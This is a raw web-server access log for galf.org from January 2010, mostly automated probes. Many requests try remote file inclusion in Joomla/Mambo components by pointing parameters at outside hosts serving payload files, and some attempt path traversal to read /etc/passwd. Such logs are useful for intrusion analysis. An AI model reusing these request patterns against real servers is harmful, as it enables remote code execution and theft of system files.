211.230.148.68 - - [04/Jan/2010:07:57:06 -0800] "GET /logs/access_090706.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:57:35 -0800] "GET /logs/access_090914.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:57:35 -0800] "GET /logs/access_091102.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:57:35 -0800] "GET /logs/access_090831.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:57:43 -0800] "GET /logs/access_091221.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.110.192.139 - - [04/Jan/2010:07:57:43 -0800] "GET /logs/index.php?libs=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
95.110.192.139 - - [04/Jan/2010:07:57:43 -0800] "GET /index.php?libs=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:57:53 -0800] "GET /logs/access_091228.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:58:40 -0800] "GET /logs/access_091116.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:58:45 -0800] "GET /logs/access_090824.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [04/Jan/2010:07:59:45 -0800] "GET /logs/access_091019.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [04/Jan/2010:07:59:45 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [04/Jan/2010:07:59:45 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:59:58 -0800] "GET /logs/access_091221.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:59:58 -0800] "GET /logs/access_091228.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [04/Jan/2010:08:00:39 -0800] "GET /logs/access_090921.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [04/Jan/2010:08:02:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
117.74.98.18 - - [04/Jan/2010:08:05:00 -0800] "GET /logs/access_090921.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.63.198.11 - - [04/Jan/2010:08:07:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:08:12:59 -0800] "GET /include/lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:08:12:59 -0800] "GET /logs/access_091207.log%20%20//include/lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:08:12:59 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:08:21:12 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.207.123 - - [04/Jan/2010:08:22:29 -0800] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:25 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:25 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:25 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:31 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:34 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:34 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:34 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:40 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:44 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:50 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:55 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:55 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:55 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:33:59 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:17 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:43 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:44 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:44 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:49 -0800] "GET /logs/access_090921.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:52 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:52 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:52 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:34:56 -0800] "GET /logs/access_090706.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:35:23 -0800] "GET /logs/access_090615.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:35:23 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:35:26 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:06 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:06 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:06 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:14 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:14 -0800] "GET /logs/access_091228.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:14 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:24 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:26 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:26 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:36:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:37:28 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:37:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:37:28 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.238.187.19 - - [04/Jan/2010:08:38:17 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "YahooCacheSystem" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:38:28 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:38:28 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:38:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:38:45 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:38:45 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:38:45 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:41:37 -0800] "GET /logs/access_091228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:41:37 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:41:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.63.226 - - [04/Jan/2010:08:42:36 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:42:36 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:42:36 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:43:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:43:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:43:38 -0800] "GET /logs/access_091228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:43:44 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:43:44 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:43:45 -0800] "GET /logs/access_090914.log%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:45:54 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:45:54 -0800] "GET /logs/access_091228.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:45:59 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:08:47:20 -0800] "GET /logs/access_091221.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:50:48 -0800] "GET /logs/access_091228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.69.237.109 - - [04/Jan/2010:08:52:10 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
174.37.63.226 - - [04/Jan/2010:08:52:50 -0800] "GET /logs/access_090921.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:08:53:35 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:08:53:35 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:08:53:35 -0800] "GET /logs/access_090921.log//components/com_flyspray/startdown.php?file=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.69.237.109 - - [04/Jan/2010:08:55:50 -0800] "GET /logs/access_091228.log//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
62.67.244.151 - - [04/Jan/2010:08:56:46 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:08:57:59 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [04/Jan/2010:08:58:01 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [04/Jan/2010:08:58:01 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [04/Jan/2010:08:58:01 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [04/Jan/2010:08:58:09 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:02:16 -0800] "GET /logs/access_091221.log%20%20////?CONFIG[main_path]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:02:16 -0800] "GET ///?CONFIG[main_path]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:02:16 -0800] "GET /logs////?CONFIG[main_path]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:02:17 -0800] "GET ///?CONFIG[main_path]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:02:17 -0800] "GET /logs////?CONFIG[main_path]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
163.152.219.201 - - [04/Jan/2010:09:02:17 -0800] "GET /logs/access_091221.log%20%20////?CONFIG[main_path]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:09 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:09:04:09 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
